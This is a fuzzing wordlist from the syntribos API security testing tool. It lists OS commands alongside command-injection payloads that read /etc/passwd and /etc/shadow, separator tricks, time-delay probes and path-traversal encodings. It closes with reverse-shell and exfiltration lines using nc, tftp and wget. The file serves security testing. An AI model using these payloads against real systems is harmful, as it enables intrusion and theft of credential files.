syntribos/data/os-cmd-execution.txt

alias
alloc
apropos
awk
basename
bash
bg
bind
bless
break
builtin
bzip
cal
caller
case
cat
cd
chflags
chgrp
chmod
chown
chroot
cksum
clear
cmp
comm
command
complete
continue
cp
cron
crontab
curl
cut
date
dc
dd
declare
defaults
df
diff
diff3
dig
dirname
dirs
diskutil
disown
ditto
dot_clean
drutil
dscacheutil
dscl
du
echo
ed
enable
env
eval
exec
exit
expand
expect
export
expr
false
fc
fdisk
fg
file
find
fmt
fold
for
fsck
fsaclctl
fs_usage
ftp
GetFileInfo
getopt
getopts
goto
grep
groups
gzip
hash
head
hdiutil
history
hostname
id
if
info
install
jobs
join
kextfind
kickstart
kill
l
last
launchctl
ll
less
let
lipo
ln
local
locate
logname
login
logout
lpr
lprm
lpstat
ls
lsregister
lsbom
lsof
man
mdfind
mdutil
mkdir
mkfifo
more
mount
mv
net
netstat
networksetup
nice
nohup
ntfs.util
onintr
open
opensnoop
osacompile
osascript
passwd
paste
pbcopy
pbpaste
pico
ping
pkgutil
plutil
pmset
popd
pr
printenv
printf
ps
pushd
pwd
quota
rcp
read
readonly
reboot
return
rev
rm
rmdir
rpm
rsync
say
screen
screencapture
sdiff
security
sed
select
set
setfile
shift
shopt
shutdown
sips
sleep
softwareupdate
sort
source
split
stop
su
sudo
sum
suspend
sw_vers
system_profiler
systemsetup
tail
tar
tee
test
textutil
time
times
top
touch
tr
trap
traceroute
true
tty
type
ufs.util
ulimit
umask
umount
unalias
uname
unexpand
uniq
units
unset
until
users
uuencode
uudecode
uuidgen
uucp
vi
wait
wc
whatis
where
which
while
who
whoami
write
xargs
yes
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
<!--#exec%20cmd="/usr/bin/id;-->
<!--#exec%20cmd="/usr/bin/id;-->
/index.html|id|
;id;
;id
;netstat -a;
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
a
arp
assoc
at
atmadm
attrib
bootcfg
break
cacls
call
change
chcp
chdir
chkdsk
chkntfs
cipher
cls
cmd
cmstp
color
comp
compact
convert
copy
cprofile
cscript
date
defrag
del
dir
diskcomp
diskcopy
diskpart
doskey
driverquery
echo
endlocal
eventcreate
eventquery
eventtriggers
evntcmd
exit
expand
fc
filter
find
findstr
finger
flattemp
for
format
fsutil
ftp
ftype
getmac
goto
gpresult
gpupdate
graftabl
help
helpctr
hostname
if
ipconfig
ipseccmd
ipxroute
irftp
label
lodctr
logman
lpq
lpr
macfile
mkdir
mmc
mode
more
mountvol
move
msiexec
msinfo32
nbtstat
net
netsh
netstat
nslookup
ntbackup
ntcmdprompt
ntsd
openfiles
pagefileconfig
path
pathping
pause
pbadmin
pentnt
perfmon
ping
popd
print
prncnfg
prndrvr
prnjobs
prnmngr
prnport
prnqctl
prompt
pushd
query
rasdial
rcp
recover
reg
regsvr32
relog
rem
rename
replace
rexec
rmdir
route
rsh
rsm
runas
sc
schtasks
secedit
set
setlocal
shift
shutdown
sort
start
subst
systeminfo
sfc
taskkill
tasklist
tcmsetup
telnet
tftp
time
title
tracerpt
tracert
tree
type
typeperf
unlodctr
ver
verify
vol
vssadmin
w32tm
winnt
winnt32
wmic
xcopy
ver
chdir
echo %USERNAME%
accept
access
aclocal
aconnect
acpi
acpi_available
acpid
addr2line
addresses
agetty
alsactl
amidi
amixer
anacron
aplay
aplaymidi
apm
apmd
apropos
apt
ar
arch
arecord
arecordmidi
arp
as
at
atd
atq
atrm
audiosend
aumix
autoconf
autoheader
automake
autoreconf
autoscan
autoupdate
badblocks
banner
basename
bash
batch
bc
biff
bison
bzcmp
bzdiff
bzgrep
bzip2
bzless
bzmore
c++
cal
cardctl
cardmgr
cat
cc
cdda2wav
cdparanoia
cdrdao
cdrecord
cfdisk
c++filt
chage
chattr
chfn
chgrp
chkconfig
chmod
chown
chpasswd
chroot
chrt
chsh
chvt
cksum
clear
cmp
col
colcrt
colrm
column
comm
compress
cp
cpio
cpp
crond
crontab
csplit
ctags
cupsd
cut
cvs
date
dd
deallocvt
debugfs
depmod
devdump
df
diff
diff3
dig
dir
dircolors
dirname
disable
dlpsh
dmesg
dnsdomainname
dnssec-keygen
dnssec-makekeyset
dnssec-signkey
dnssec-signzone
doexec
domainname
dosfsck
du
dump
dumpe2fs
dumpkeys
e2fsck
e2image
e2label
echo
edquota
egrep
eject
elvtune
emacs
enable
env
envsubst
esd
esdcat
esd-config
esdctl
esddsp
esdmon
esdplay
esdrec
esdsample
etags
ex
expand
expr
factor
false
fc-cache
fc-list
fdformat
fdisk
fetchmail
fgconsole
fgrep
file
find
finger
fingerd
flex
fmt
fold
formail
free
fsck
ftp
ftpd
fuser
g++
gawk
gcc
gdb
getent
getkeycodes
gpasswd
gpg
gpgsplit
gpgv
gpm
gprof
grep
groff
groffer
groupadd
groupdel
groupmod
groups
grpck
grpconv
gs
gunzip
gzexe
gzip
halt
hdparm
head
hexdump
host
hostid
hostname
htdigest
hwclock
iconv
id
ifconfig
imapd
inetd
info
init
insmod
install
ipcrm
ipcs
iptables
iptables-restore
iptables-save
isodump
isoinfo
isosize
isovfy
ispell
join
kbd_mode
kbdrate
kernelversion
kill
killall
killall5
klogd
kudzu
last
lastb
lastlog
ld
ldconfig
ldd
less
lesskey
lftp
lftpget
link
ln
loadkeys
locale
locate
lockfile
logger
login
logname
logrotate
look
losetup
lpadmin
lpinfo
lpmove
lpq
lpr
lprm
lpstat
ls
lsattr
lsmod
lspci
lsusb
m4
mail
mailq
mailstats
mailto
make
makedbm
makemap
man
manpath
mattrib
mbadblocks
mcat
mcd
mcopy
md5sum
mdel, mdeltree
mdir
mdu
merge
mesg
metamail
metasend
mformat
mimencode
minfo
mkdir
mkdosfs
mke2fs
mkfifo
mkfs
mkfs.ext3
mkisofs
mklost+found
mkmanifest
mknod
mkraid
mkswap
mktemp
mlabel
mmd
mmount
mmove
modinfo
modprobe
more
mount
mountd
mpartition
mpg123
mpg321
mrd
mren
mshowfat
mt
mtools
mtoolstest
mtype
mv
mzip
named
namei
nameif
netstat
newaliases
newgrp
newusers
nfsd
nfsstat
nice
nm
nohup
nslookup
nsupdate
objcopy
objdump
od
openvt 	
passwd
paste
patch
pathchk
perl
pidof
ping
pinky
pmap
portmap
poweroff
pppd
pr
praliases
printenv
printf
ps
ptx
pwck
pwconv
pwd
python
quota
quotacheck
quotaoff
quotaon
quotastats
raidstart
ramsize
ranlib
rarpd
rcp
rdate
rdev
rdist
rdistd
readcd
readelf
readlink
reboot
reject
rename
renice
repquota
reset
resize2fs
restore
rev
rexec
rexecd
richtext
rlogin
rlogind
rm
rmail
rmdir
rmmod
rndc
rootflags
route
routed
rpcgen
rpcinfo
rpm
rsh
rshd
rsync
runlevel
rup
ruptime
rusers
rusersd
rwall
rwho
rwhod
sane-find-scanner
scanadf
scanimage
scp
screen
script
sdiff
sed
sendmail
sensors
seq
setfdprm
setkeycodes
setleds
setmetamode
setquota
setsid
setterm
sftp
sh
sha1sum
showkey
showmount
shred
shutdown
size
skill
slabtop
slattach
sleep
slocate
snice
sort
split
ssh
ssh-add
ssh-agent
sshd
ssh-keygen
ssh-keyscan
stat
statd
strace
strfile
strings
strip
stty
su
sudo
sum
swapoff
swapon
sync
sysctl
sysklogd
syslogd
tac
tail
tailf
talk
talkd
tar
taskset
tcpd
tcpdump
tcpslice
tee
telinit
telnet
telnetd
test
tftp
tftpd
time
tload
tmpwatch
top
touch
tr
tracepath
traceroute
troff
true
tset
tsort
tty
tune2fs
tunelp
ul
umount
uname
uncompress
unexpand
unicode_start
unicode_stop
uniq
uptime
useradd
userdel
usermod
users
usleep
uudecode
uuencode
uuidgen
vdir
vi
vidmode
vim
vmstat
volname
w
wall
warnquota
watch
wc
wget
whatis
whereis
which
who
whoami
whois
write
xargs
xinetd
yacc
yes
ypbind
ypcat
ypinit
ypmatch
yppasswd
yppasswdd
yppoll
yppush
ypserv
ypset
yptest
ypwhich
ypxfr
zcat
zcmp
zdiff
zdump
zforce
zgrep
zic
zless
zmore
znew
uname -n -s
whoami
pwd
last
cat /etc/passwd
ls -la /tmp
ls -la /home
ping -i 30 127.0.0.1 
ping 127.0.0.1
ping -n 30
get-acl
set-acl
get-alias
import-alias
new-alias
set-alias
get-authenticodesignature
set-authenticodesignature
set-location
get-childitem
get-command
measure-command
trace-command
add-content
get-content
set-content
clear-content
convertto-html
convertfrom-securestring
convertto-securestring
clear-host
clear-item
copy-item
get-credential
get-childitem
get-date
set-date
remove-item
do
get-psdrive
new-psdrive
remove-psdrive
get-eventlog
get-executionpolicy
set-executionpolicy
export-alias
export-clixml
export-console
export-csv
invoke-expression
exit
foreach-object
foreach
for
format-custom
format-list
format-table
format-wide
get-item
get-childitem
get-help
add-history
get-history
invoke-history
get-host
clear-host
read-host
write-host
if
import-clixml
import-csv
get-item
invoke-item
new-item
remove-item
set-item
clear-itemproperty
copy-itemproperty
get-itemproperty
move-itemproperty
new-itemproperty
remove-itemproperty
rename-itemproperty
set-itemproperty
stop-process
get-location
pop-location
push-location
set-location
add-member
get-member
move-item
compare-object
group-object
measure-object
new-object
select-object
sort-object
where-object
out-default
out-file
out-host
out-null
out-printer
out-string
powershell
convert-path
join-path
resolve-path
split-path
test-path
get-pfxcertificate
pop-location
push-location
get-process
stop-process
clear-itemproperty
copy-itemproperty
get-itemproperty
move-itemproperty
new-itemproperty
remove-itemproperty
rename-itemproperty
set-itemproperty
get-psprovider
set-psdebug
add-pssnapin
get-pssnapin
remove-pssnapin
quest
read-host
remove-item
rename-item
rename-itemproperty
run/call
select-object
get-service
new-service
restart-service
resume-service
set-service
sort-object
start-service
stop-service
suspend-service
start-sleep
switch
select-string
tee-object
new-timespan
trace-command
get-tracesource
set-tracesource
start-transcript
stop-transcript
get-uiculture
get-unique
update-formatdata
update-typedata
clear-variable
get-variable
new-variable
remove-variable
set-variable
where-object
where
while
get-wmiobject
write-debug
write-error
write-output
write-progress
write-verbose
write-warning
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c
+|+Dir+c:\
$+|+Dir+c:\
%26%26+|+dir c:\
$%26%26dir c:\
%0a+dir+c:\
+|+Dir+c:%255c
$+|+Dir+c:%255c
%26%26+|+dir c:%255c
$%26%26dir+c:%255c
%0a+dir+c:%255c
+|+Dir+c:%2f
$+|+Dir+c:%2f
%26%26+|+dir c:%2f
$%26%26dir+c:%2f
%0a+dir+c:%2f
+dir+c:\+|
+|+dir+c:\+|
+|+dir+c:%2f+|
dir+c:\
||+dir|c:\
   Executing Commands
Seperating Commands: 
blah;blah2
PIPEZ: 
blah ^ blah2
AND: 
blah && blah2
OR: 
FAIL || X
OR: 
blah%0Dblah2%0Dblah3
Backtick: 
`blah`
Background: 
`blah & blah2`
   Getting Files / Data
FTP: 
Make a new text, and echo and then redirect to FTP
NC: 
nc -e /bin/sh
NC: 
echo /etc/passwd  | nc host port
TFTP: 
echo put /etc/passwd | tftp host
WGET: 
wget --post-file /etc/passwd